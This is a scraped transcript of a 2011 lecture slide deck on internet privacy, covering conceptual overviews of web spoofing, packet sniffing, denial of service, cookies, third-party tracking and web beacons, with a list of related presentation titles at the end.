Presentation is loading. Please wait.

Presentation is loading. Please wait.

Fall 2011. 2 Personal privacy Rights of individuals/entities Informational /database protection Government Regulation & surveillance Workplace Privacy.

Published byReynold Rose Modified over 8 years ago

Similar presentations

Presentation on theme: "Fall 2011. 2 Personal privacy Rights of individuals/entities Informational /database protection Government Regulation & surveillance Workplace Privacy."— Presentation transcript:

1 Fall 2011

2 2

3 Personal privacy Rights of individuals/entities Informational /database protection Government Regulation & surveillance Workplace Privacy Children’s online privacy Freedom of Speech & Expression Anonymity online Phising Privacy Encryption methods,spywares, Filtering tools,spam…. 3

4 Many online activities are open to public inspection. Engaging in these types of activities does not normally create an expectation of privacy. In fact, according to federal law, it is not illegal for anyone to view or disclose an electronic communication if the communication is "readily accessible" to the public (Electronic Communications Privacy Act, 18 USC § 2511(2)(g)(I)). 4

5 Yes. Many people expect that their online activities are anonymous. They are not. It is possible to record virtually all online activities, including which newsgroups or files a subscriber accesses and which web sites are visited. This information can be collected by a subscriber's own ISP and by web site operators. 5

6 Yes. Many of the commercial online services such as AOL automatically download graphics and program upgrades to the user's home computer. The subscriber is notified of these activities. But other intrusions are not so evident. Some services have admitted to both accidental and intentional prying into the memory of personal computers 6

7 Intruders want to control your system Peer Respect Curiosity (can it be done?) Boredom Revenge Financial (Company Secrets) Employment Needed to hide other activities. 7

8 Thrill-seeking malicious hackers Competitors Enemies Other adversaries school, games, romance, commerce, etc. Child molesters, pedophiles, murderers Buggy software Security professionals (to demonstrate problems) 8

9 Data loss Time loss Site hijacking/content changing Forged network connections Privacy loss Credit/financial loss Loss of innocence 9

10 On the Internet, we KNOW that...: Many if not most users are naive  Will do whatever their computer tells them to do Most users run buggy software  And are too lazy or not knowledgeable enough to upgrade Users can’t be expected to understand protocols  They won’t check to see what security is in use Users will leave their system configured for:  Maximum utility  Ease of use 10

11 11

12 12

13 13 Sportbrain Monitors daily workout. Custom phone cradle uploads data to company Web site for analysis. http://www.sportbrain.com/ Sony eMarker Lets you figure out the artitst and title of songs you hear on the radio. And keeps a personal log of all the music you like on the emarker Web site. http://www.emarker.com Creative Labs Nomad JukeBox Music transfer software reports all uploads to Creative Labs. http://www.nomadworld.com

14 Web Spoofing Network Sniffing Denial of Service Privacy Violations 14

15 Redirection of all web requests to a false web URL rewriting to catch victim in false Web e.g. http://www.attacker.org/http://netscape.com spoofing of forms equally possible ‘ secure connections ’ don’t help the connection is secure fine-tuning of the attack : get rid of all the evidence e.g. hide status line and location line 15

16 16 ATTACKER CLIENT WEB SERVER REQUEST SPOOF URL 1 REQUEST REAL URL 2 SEND REAL PAGE CONTENTS 3 SPOOFED PAGE CONTENTS 5 4 CHANGE PAGE CONTENTS The link you think you are making

17 A sniffer is a program that captures and logs the first 128 bytes of every telnet connection that passes through a network. Contains the username Contains the password 17 Normal Mode

18 A sniffer puts the interface in promiscuous mode, where it captures all packets placed on the subnet. The first 128 bytes of telnet connections are logged. 18

19 19

20 About 3 years ago someone launched a sniffer attack against two regional service providers’ routers, through which huge amounts of traffic flow; one estimate is the attackers got 10,000 accounts, hosts, and passwords Recurs periodically. 20

21 Attacker causes server crash, or floods server or network link with requests, in order to prevent processing of legitimate requests. No truly effective solutions. Can detect attack and filter packets from the source, but attack could be distributed. 21

22 The web sites you use collect demographic information and transaction information. History of current web session may be available to server. Try this web location: http://hoohoo.ncsa.uiuc.edu/cgi/examples.html. Did you know that any website can read and write to your disk through your browser and that you cannot stop them? The disturbing part of this capability is that information can be stored on your computer and passed around to other web servers at the discretion of the server that creates the magic cookie. The action does not need your consent and is routinely done without your knowledge 22

23 Browsers chatter about IP address, domain name, organization, Referring page Platform: O/S, browser What information is requested  URLs and search terms Cookies To anyone who might be listening End servers System administrators Internet Service Providers Other third parties  Advertising networks Anyone who might subpoena log files later 23

24 Many web services want a place for storing information about their customers. This information could be held in the server, but storage requirements and search times will be prohibitive for a large user base. It is thus easier to use the customer’s site with the help of a co-operating browser. The server asks the browser to store a cookie that contains information the server will refer to next time the client calls. 24

25 Cookies can be useful Used like a staple to attach multiple parts of a form together Used to identify you when you return to a web site so you don’t have to remember a password Used to help web sites understand how people use them Cookies can do unexpected things Used to profile users and track their activities, especially across web sites 25

26 A cookie stores a small string of characters A web site asks your browser to “set” a cookie Whenever you return to that site your browser sends the cookie back automatically 26 browsersite First visit to site Please store cookie xyzzy browsersite Later visits Here is cookie xyzzy

27 Cookie Replay – sending a cookie back to a site Session cookie – cookie replayed only during current browsing session Persistent cookie – cookie replayed until expiration date First-party cookie – cookie associated with the site the user requested Third-party cookie – cookie associated with an image, ad, frame, or other content from a site with a different domain name that is embedded in the site the user requested Browser interprets third-party cookie based on domain name, even if both domains are owned by the same company 27

28 Every time the same cookie is replayed to a site, the site may add information to the record associated with that cookie Number of times you visit a link, time, date What page you visit What page you visited last Information you type into a web form If multiple cookies are replayed together, they are usually logged together, effectively linking their data Narrow scoped cookie might get logged with broad scoped cookie 28

29 29 Ad company can get your name and address from CD order and link them to your search Ad search for medical information set cookie buy CD replay cookie Search ServiceCD Store

30 30  Personal data:  Email address  Full name  Mailing address (street, city, state, and Zip code)  Phone number  Transactional data:  Details of plane trips  Search phrases used at search engines  Health conditions

31 Part of the Cookie file looks like 31 # Netscape HTTP Cookie File # http://www.netscape.com/newsref/std/cookie_spec.html # This is a generated file! Do not edit. www.ft.comTRUE/cgi-bin/ft/bridgeFALSE946641882BRIDGESeen www.esi.co.ukFALSE/freeFALSE9466853002101128RkhIQ1RTVlRJICAgLDI2NjcxNDA=.disney.comTRUE/FALSE1514892844SWID8AF1B6C4-8774-11D1-902E-00805FC18F5F.disney.comTRUE/FALSE942189160DOL130210884190844.excite.comTRUE/FALSE946641308registeredno.excite.comTRUE/FALSE946641477UID6BF1DD5034D834AC.amazon.comTRUE/FALSE2082786916ubid-main9677-2013463-658329

32 The cookie in your browser always includes information such as: The address of the server that sent it An expire date after which the cookie will be deleted Additionally, the cookie may include information such as whether you are registered for the site and whether you have a password and username If on returning to the site the remote web server discovers that you have a cookie set, it can use this to retrieve information stored about you on your previous visit For example, an Internet bookstore web server might store information about your preferences in authors. It could then offer you a list of books based on your previous visit, rather than asking you to submit your profile again 32

33 If you check your cookies.txt file, you may well find cookies from sites that you have no recollection of having visited. For example:. doubleclick.netTRUE/FALSE1920499140id 45855481 DoubleClick Inc is a US company which uses information stored in cookies for advertising purposes. Information is collected from users' cookie.txt files, and used to determine for example which banner advertising to send to that user when he/she next logs on to a Web site which has links with DoubleClick DoubleClick claims that their use of Cookies benefits Web users by preventing "bombardment" by multiple copies of the same advertising 33

34 You can set preferences for accepting cookies e.g. in the P references item of the Netscape Edit menu. For example, you can ask to be warned before accepting any cookies Some users create an empty cookies.txt file and disable access to it 34

35 Invisible “images” (1-by-1 pixels, transparent) embedded in web pages and cause referer info and cookies to be transferred Also called web beacons, clear gifs, tracker gifs,etc. Work just like banner ads from ad networks, but you can’t see them unless you look at the code behind a web page Also embedded in HTML formatted email messages, MS Word documents, etc. 35

36 Helper programs and Plug-ins can be Dangerous Websites Collect Information about YOU Do Not Let a Website Interrogate You Websites Can Lie Use Common Sense Stay out of Bad Neighborhoods 36

37 Data is often collected silently Web allows large quantities of data to be collected inexpensively and unobtrusively Data from multiple sources may be merged Non-identifiable information can become identifiable when merged Data collected for business purposes may be used in civil and criminal proceedings Users given no meaningful choice Few sites offer alternatives 37

Download ppt "Fall 2011. 2 Personal privacy Rights of individuals/entities Informational /database protection Government Regulation & surveillance Workplace Privacy."

Similar presentations

The Internet and the Web

The Internet and the Web
Transfer Content to a Website What is FTP? File Transfer Protocol FTP is a protocol – a set of rules Designed to allow files to be transferred across.

Transfer Content to a Website What is FTP? File Transfer Protocol FTP is a protocol – a set of rules Designed to allow files to be transferred across.
Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
09/04/2015Unit 2 (b) Back-Office processes Unit 2 Assessment Criteria (b) 10 marks.

09/04/2015Unit 2 (b) Back-Office processes Unit 2 Assessment Criteria (b) 10 marks.
Unit 11 Using the Internet & Browsing the Web.  Define the Internet and the Web  Set up & troubleshoot an Internet connection  Categorize webs sites.

Unit 11 Using the Internet & Browsing the Web.  Define the Internet and the Web  Set up & troubleshoot an Internet connection  Categorize webs sites.
ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.

ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.
6 C H A P T E R © 2001 The McGraw-Hill Companies, Inc. All Rights Reserved1 Electronic Mail Electronic mail has revolutionized the way people communicate.

6 C H A P T E R © 2001 The McGraw-Hill Companies, Inc. All Rights Reserved1 Electronic Mail Electronic mail has revolutionized the way people communicate.
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.

Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
6/10/2015Cookies1 What are Cookies? 6/10/2015Cookies2 How did they do that?

6/10/2015Cookies1 What are Cookies? 6/10/2015Cookies2 How did they do that?
Privacy Policy, Law and Technology Carnegie Mellon University Fall 2007 Lorrie Cranor 1 Web Privacy.

Privacy Policy, Law and Technology Carnegie Mellon University Fall 2007 Lorrie Cranor 1 Web Privacy.
Technological Implications for Privacy David Kotz Department of Computer Science Dartmouth College

Technological Implications for Privacy David Kotz Department of Computer Science Dartmouth College
SESSION 9 THE INTERNET AND THE NEW INFORMATION NEW INFORMATIONTECHNOLOGYINFRASTRUCTURE.

SESSION 9 THE INTERNET AND THE NEW INFORMATION NEW INFORMATIONTECHNOLOGYINFRASTRUCTURE.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
Privacy Policy, Law and Technology Carnegie Mellon University Spring 2004 Lorrie Cranor 1 Online privacy concerns.

Privacy Policy, Law and Technology Carnegie Mellon University Spring 2004 Lorrie Cranor 1 Online privacy concerns.
Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP does not maintain state. State Information can be passed using: HTTP Headers.

Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP does not maintain state. State Information can be passed using: HTTP Headers.
Chapter 10 Publishing and Maintaining Your Web Site.

Chapter 10 Publishing and Maintaining Your Web Site.
Lesson 46: Using Information From the Web copy and paste information from a Web site print a Web page download information from a Web site customize Web.

Lesson 46: Using Information From the Web copy and paste information from a Web site print a Web page download information from a Web site customize Web.

Similar presentations

Ads by Google